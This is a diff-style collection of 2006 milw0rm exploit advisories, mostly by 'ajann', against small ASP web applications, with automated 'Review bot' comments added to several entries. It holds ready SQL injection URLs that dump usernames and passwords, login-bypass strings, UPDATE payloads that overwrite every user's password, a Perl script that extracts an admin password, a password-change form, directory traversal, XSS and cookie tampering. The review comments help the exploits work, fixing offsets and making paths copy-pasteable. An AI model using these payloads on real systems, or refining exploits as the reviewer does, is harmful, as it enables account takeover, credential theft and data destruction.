<b><font size="2" face="Arial">User Name:</font></b></td> <b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr> </tr>
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td> <b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr> </tr>
</table> </table>
<form method="POST" name="form2" action="#"> <form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p> <input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form> </form>
</center> </center>
<script language="JavaScript"> <script language="JavaScript">
write() write()
functionControl1() functionControl1()
</script> </script>
</body> </body>
</html> </html>
<% <%
End If End If
End If End If
End If End If
End If End If
Set objtake = Nothing Set objtake = Nothing
%> %>
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]
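Review bot: `passwd=Mid(get_password,getdata+24,14)` reuses the `getdata` offset that `InStr(get_username,"Poll Question:</b>&nbsp;")` computed from the username response instead of locating the marker in `get_password`, so any difference in the two pages' length before the marker shifts the extracted password; call `InStr(get_password, ...)` separately. The fixed width of 14 characters also truncates longer usernames and hashes (the banner itself says the value still has to be decrypted afterwards, so a cut hash is useless); take the substring up to the closing tag rather than a constant. Minor: `<% On Error Resume Next %>` at the top hides `Microsoft.XMLHTTP` failures, so a connection error surfaces only as an empty field, and `Set objtake = Nothing` before the final `%>` refers to a variable that is local to `take()` and already released there.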


@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability # Title : UStore 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Vendor: http://www.superfreaker.com/ # Vendor: http://www.superfreaker.com/
******************************************************************************* *******************************************************************************
###http://[target]/[path]//detail.asp?ID=[SQL] ###http://[target]/[path]//detail.asp?ID=[SQL]
Example: Example:
//detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201 //detail.asp?ID=-1%20union%20select%200,username,password,0,0,0,0,0,0,0%20from%20tblusers%20where%20id%20like%201
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]
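Review bot: the template `###http://[target]/[path]//detail.asp?ID=[SQL]` has a doubled slash after `[path]`, apparently carried over from the `//detail.asp?...` example line beneath it (the USupport and UPublisher entries repeat the same slip); use a single slash so the path is copy-pasteable. The example filters with `where id like 1`; `id=1` is the portable form for a numeric key and is what the title's "Remote SQL Injection" reader will expect, so either use it or state why `like` is needed on this target.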


@ -1,22 +1,22 @@
******************************************************************************* *******************************************************************************
# Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability # Title : USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Vendor: http://www.superfreaker.com/ # Vendor: http://www.superfreaker.com/
# Dork : UPublisher # Dork : UPublisher
******************************************************************************* *******************************************************************************
###http://[target]/[path]//detail.asp?id=[SQL] ###http://[target]/[path]//detail.asp?id=[SQL]
Example: Example:
//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers //detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]


@ -1,25 +1,25 @@
******************************************************************************* *******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection # Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability Vulnerability
# Author : ajann # Author : ajann
# Dork : UPublisher # Dork : UPublisher
# Vendor: http://www.superfreaker.com/ # Vendor: http://www.superfreaker.com/
******************************************************************************* *******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL] ###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example: Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers //viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR --- OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers //viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-12] # milw0rm.com [2006-11-12]


@ -1,36 +1,36 @@
<!-- <!--
# Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit # Title : Online Event Registration <= v2.0 (save_profile.asp) Remote User Pass Change Exploit
# Author : ajann # Author : ajann
[Code]]] [Code]]]
--> -->
<html> <html>
<body bgcolor="#000000"> <body bgcolor="#000000">
<form method="POST" action="save_profile.asp?key=1&regkey="> <form method="POST" action="save_profile.asp?key=1&regkey=">
User Name<input type="hidden" name="UserID" size="4"> User Name<input type="hidden" name="UserID" size="4">
<input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40"> <input type="text" name="UserName" size="20" class="TBox" value="Demo Account" maxlength="40">
<input type="text" name="Company" size="40" class="TBox" value="Demo Account"> <input type="text" name="Company" size="40" class="TBox" value="Demo Account">
Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40"> Email<input type="text" name="EmailAddress" size="40" class="TBox" value="demo@codewidgets.net" maxlength="40">
Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14"> Phone<input type="text" name="Phone" size="20" class="TBox" value="780-429-2318" maxlength="14">
Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319"> Fax<input type="text" name="Fax" size="20" class="TBox" value="780-429-2319">
Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10"> Password<input name="Password" size="20" class="TBox" value="demo" maxlength="10">
<input type="submit" value="Submit" name="B1" class="PButton"> <input type="submit" value="Submit" name="B1" class="PButton">
</form> </form>
</body> </body>
</html> </html>
<!-- <!--
[/Code]]] [/Code]]]
Change: <input type="hidden" name="UserID" size="4"> => ID Change: <input type="hidden" name="UserID" size="4"> => ID
Next Click "Profile" Next Click "Profile"
#ajann,Turkey #ajann,Turkey
#... #...
#Im Not Hacker! #Im Not Hacker!
--> -->
# milw0rm.com [2006-11-13] # milw0rm.com [2006-11-13]


@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability # Title : Property Pro v1.0 (vir_Login.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
Example: Example:
###http://[target]/[path]/admin/ ###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin UserName: ' union select 0,0 from admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-13] # milw0rm.com [2006-11-13]


@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability # Title : ASP Smiley v1.0 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
Example: Example:
###http://[target]/[path]/admin/ ###http://[target]/[path]/admin/
UserName: ' union select 0,0,0,0,0,0,0,0 from categories UserName: ' union select 0,0,0,0,0,0,0,0 from categories
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]


@ -1,20 +1,20 @@
******************************************************************************* *******************************************************************************
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability # Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
###http://[target]/[path]//page.asp?NewsID=[SQL] ###http://[target]/[path]//page.asp?NewsID=[SQL]
Example: Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201 //page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]


@ -1,24 +1,24 @@
blogme v3 [admin login bypass & xss (post)] blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/ vendor site:http://www.drumster.net/
product:blogme v3 product:blogme v3
bug:login bypass & xss (post) bug:login bypass & xss (post)
risk:high risk:high
admin login bypass : admin login bypass :
user : ' or '1' = '1 user : ' or '1' = '1
passwd: 1'='1' ro ' passwd: 1'='1' ro '
xss post : xss post :
in: /comments.asp?blog=85 in: /comments.asp?blog=85
vulnerables fields: vulnerables fields:
- Name - Name
- URL - URL
- Comments - Comments
laurent gaffié & benjamin mossé laurent gaffié & benjamin mossé
http://s-a-p.ca/ http://s-a-p.ca/
contact: saps.audit@gmail.com contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]


@ -1,22 +1,22 @@
vendor site:http://hpe.net/ vendor site:http://hpe.net/
product:hpecs shopping cart product:hpecs shopping cart
bug:injection sql bug:injection sql
risk:high risk:high
login bypass : login bypass :
username: 'or''=' username: 'or''='
passwd: 'or''=' passwd: 'or''='
injection sql (post) : injection sql (post) :
http://site.com/search_list.asp http://site.com/search_list.asp
variables: variables:
Hpecs_Find=maingroup&searchstring='[sql] Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... ) ( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé laurent gaffié & benjamin mossé
http://s-a-p.ca/ http://s-a-p.ca/
contact: saps.audit@gmail.com contact: saps.audit@gmail.com
# milw0rm.com [2006-11-14] # milw0rm.com [2006-11-14]


@ -1,57 +1,57 @@
******************************************************************************* *******************************************************************************
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability # Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# S.Page : http://www.aspnuke.com # S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470 # D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
******************************************************************************* *******************************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
ASP Nuke ASP Nuke
Kenneth W. Richards Kenneth W. Richards
Orvado Technologies Orvado Technologies
-Introduction- -Introduction-
ASP Nuke is an open-source software application for running a ASP Nuke is an open-source software application for running a
community-based web site on a web server. community-based web site on a web server.
By open-source, we mean the code is freely available for others to read, By open-source, we mean the code is freely available for others to read,
modify and use in accordance modify and use in accordance
with the software license. with the software license.
ASP Nuke is an extensible framework that allows you to upgrade and add ASP Nuke is an extensible framework that allows you to upgrade and add
applications to the website quickly applications to the website quickly
and easily. It uses a modular architecture allowing others to rapidly and easily. It uses a modular architecture allowing others to rapidly
develop new modules and site operators develop new modules and site operators
to re-organize the layout and navigation for their site. to re-organize the layout and navigation for their site.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerability:: Vulnerability::
_________________ _________________
###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&.... ###http://[target]/[path]//module/account/register/register.asp?StateCode=[SQL]&..&..&..&..&..&..&..&..&....
Example = Poll Update Example = Poll Update
///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register ///module/account/register/register.asp?StateCode=0',0,0,0,0,0);update%20tblPoll%20set%20Question%20=%20'hacked'--&FirstName=namename1&LastName=namename2&Username=abcdefghijk&Password=1234567890&Confirm=1234567890&Address1=kro.mahallesi&Address2=kro.apt&City=aaaaaaaaa&ZipCode=101010101&CountryID=0&Email=mailmail@mailbidaamail.com&Action=ADD&_dummy=Register
Note: Change UserName because ; failed:already username dont write. Note: Change UserName because ; failed:already username dont write.
Some tables,columns Some tables,columns
___________________ ___________________
[tblMember] | [FaqQuestion] [tblMember] | [FaqQuestion]
MemberID | QuestionID MemberID | QuestionID
Username | DocumentID Username | DocumentID
Password | Question Password | Question
Firstname | Answer Firstname | Answer
Middlename | Active Middlename | Active
EmailAddress | OrderNo EmailAddress | OrderNo
.. | .. .. | ..
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-19] # milw0rm.com [2006-11-19]


@ -1,58 +1,58 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit #[Script Name: fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
use IO::Socket; use IO::Socket;
if(@ARGV < 3){ if(@ARGV < 3){
print " print "
[======================================================================== [========================================================================
[// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit [// fipsCMS <= v4.5 (index.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid] [// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1 [// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1 [// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$dir = $ARGV[1]; $dir = $ARGV[1];
$file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid="; $file = "index.asp?lg=1&w=forumshow&fcat=-1&fansweres=True&froot=1&fid=";
$target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2]; $target = "-1%20union%20select%200,0,0,0,0,adminpword,0,0,0,0,0,0%20from%20admin%20where%20adminid%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n"; print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){ if ($answer =~ /\"150\" value=\"Re:(.*?)class=\"/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Password: $1\n"; print "+ Password: $1\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
print "+ Exploit failed :(\n"; print "+ Exploit failed :(\n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
# milw0rm.com [2006-11-22] # milw0rm.com [2006-11-22]
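Review bot: the substitution `$server =~ s/(http:\/\/)//eg;` carries the `/e` flag, which makes Perl evaluate the (empty) replacement as an expression; it happens to yield an empty string, but it is not what is meant, and `s{^http://}{}` states the intent without the capture group or the `/g`. The script also runs without `use strict;` and `use warnings;`, so `$server`, `$host`, `$dir`, `$file`, `$target` and `$socket` are all undeclared package globals; a one-line `my` declaration for each would keep the archived copy lint-clean.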


@ -1,24 +1,24 @@
******************************************************************************* *******************************************************************************
# Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability # Title : fipsGallery <= v1.5 (index1.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# $$$ : 29 Euro # $$$ : 29 Euro
******************************************************************************* *******************************************************************************
###http://[target]/[path]//index1.asp?what=artists&which=[SQL] ###http://[target]/[path]//index1.asp?what=artists&which=[SQL]
Example: Example:
//index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin //index1.asp?what=artists&which=-1%20union%20select%200,username,password%20from%20admin
See you Admin Hash.. See you Admin Hash..
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-22] # milw0rm.com [2006-11-22]


@ -1,22 +1,22 @@
******************************************************************************* *******************************************************************************
# Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability # Title : fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
******************************************************************************* *******************************************************************************
###http://[target]/[path]//default2.asp?kat=[SQL] ###http://[target]/[path]//default2.asp?kat=[SQL]
Example: Example:
//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config //default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-22] # milw0rm.com [2006-11-22]


@ -1,23 +1,23 @@
******************************************************************************* *******************************************************************************
# Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability # Title : Liberum Help Desk <= 0.97.3 (details.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license # Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license
******************************************************************************* *******************************************************************************
###http://[target]/[path]//details.asp?id=[SQL] ###http://[target]/[path]//details.asp?id=[SQL]
Example: Example:
//details.asp?id=2)%20update%20tblusers%20set%20password='kro'-- //details.asp?id=2)%20update%20tblusers%20set%20password='kro'--
=> All Password Changed to "kro" => All Password Changed to "kro"
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-25] # milw0rm.com [2006-11-25]
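Review bot: the impact of this entry is only stated after the payload, in `=> All Password Changed to "kro"`, yet the example is a state-changing `update tblusers set password='kro'--` with no WHERE clause, so running it rewrites every account's password; the header block should carry an explicit impact line (e.g. `# Impact : destructive, overwrites all passwords in tblusers`) so the entry is not mistaken for the read-only detail.asp injections that surround it in this diff.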


@ -1,12 +1,12 @@
# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability # Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar # Author : bolivar
# Dork : "This script created by www.script.canavari.com" # Dork : "This script created by www.script.canavari.com"
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
# Just for Fun!! # Just for Fun!!
# milw0rm.com [2006-11-25] # milw0rm.com [2006-11-25]


@ -1,32 +1,32 @@
************************************************************************************************** **************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability # Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann # Author : ajann
# S.Page : http://www.rot.dk # S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp # D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx # Greetz : Nukedx
************************************************************************************************** **************************************************************************************************
Cookie Cookie
---------- ----------
Open the Cookie Editor=> Open the Cookie Editor=>
Find cookie informations. Find cookie informations.
Change Informations= Change Informations=
Cookie Informations: Cookie Informations:
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email ASPNUKE14%5Femail , email => User Email
Save and go to default.asp. Save and go to default.asp.
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-25] # milw0rm.com [2006-11-25]


@ -1,12 +1,12 @@
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability # Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar # Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net" # Dork : "SimpleBlog 2.3 by 8pixel.net"
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
# Just for Fun!! # Just for Fun!!
# milw0rm.com [2006-11-26] # milw0rm.com [2006-11-26]


@ -1,39 +1,39 @@
******************************************************************************* *******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities # Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
******************************************************************************* *******************************************************************************
Login Before Vulnerabilities.: Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------ [[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL] http://[target]/[path]//getfile.asp?filename=[SQL]
Example: Example:
//getfile.asp?filename=../index.asp //getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini //getfile.asp?filename=../../../boot.ini
[[/SOURCE]]] [[/SOURCE]]]
[[XSS]]]--------------------------------------------------------- [[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS] http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example: Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E //index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]] [[/XSS]]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-12-01] # milw0rm.com [2006-12-01]
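Review bot: the `[[SOURCE]]]` block is mislabelled: the template `getfile.asp?filename=[SQL]` uses the `[SQL]` placeholder, but both examples (`../index.asp`, `../../../boot.ini`) are directory traversal reads, not SQL, so the placeholder should be `[PATH]` and the title's "Source" should read "Directory Traversal / Source Disclosure" so the entry is classified correctly in the index. The line `Login Before Vulnerabilities.:` should also say plainly that both issues are post-authentication, since that precondition changes the risk rating.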


@ -1,28 +1,28 @@
************************************************************************************* *************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability # Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# $$$ : $2,499 # $$$ : $2,499
************************************************************************************* *************************************************************************************
[[SQL]]] [[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL] ###http://[target]/[path]//login.asp=[POST SQL]
Example: Example:
-> All User UserName And Password Changed "kro" -> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'-- // login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'-- // login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]] [[/SQL]]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-12-09] # milw0rm.com [2006-12-09]
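Review bot: the template line `###http://[target]/[path]//login.asp=[POST SQL]` has a stray `=` and names no parameter, while the two examples below show the injection point is the POST field `UserName`; writing it as `login.asp (POST UserName=[SQL])` would match the examples. The result line `-> All User UserName And Password Changed "kro"` is also placed above the examples, unlike the other entries in this diff where the result follows the example, and it describes two separate payloads (one on `password`, one on `loginName`), which is easier to read as one result line per example.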


@ -1,30 +1,30 @@
************************************************************************************* *************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability # Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# $$$ : $8,000 # $$$ : $8,000
************************************************************************************* *************************************************************************************
[[SQL]]] [[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL] ###http://[target]/[path]//ProductDetails.asp=[SQL]
Example: Example:
-> All News Title Changed to = "kro" -> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'-- //ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro" -> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2-- //ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]] [[/SQL]]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-12-09] # milw0rm.com [2006-12-09]
